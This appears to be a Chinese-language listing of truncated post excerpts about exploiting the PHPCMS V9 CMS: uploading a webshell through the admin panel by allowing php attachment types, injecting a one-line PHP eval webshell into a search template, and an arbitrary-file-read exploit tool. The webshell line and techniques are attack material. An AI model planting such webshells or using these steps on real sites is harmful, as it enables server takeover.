phpcmsV9

不再关注网络安全

phpcmsv9后台传webshell

过滤不严格,在某些条件下,可直接上传webshell 操作说明: 拿最新版本的phpcms本地测试了一下,站点管理 附件类型直接添加php与php4,上传后文件名会变为 xx...

phpcmsV9后台拿shell

search目录下面的index.html右侧的编辑 修改其模版为: PHP <?php $shell = '<?php @eval($_POST[cmd]);?>' ; ...

phpcmsV9任意读文件漏洞利用工具

注意:本程序带有攻击性,仅供学习研究请勿当作非法工具使用,否则后果自负,于本人无关! 睡觉前去论坛上面看了下,爆出 phpcmsV9最新任意读文件漏洞 ,第一...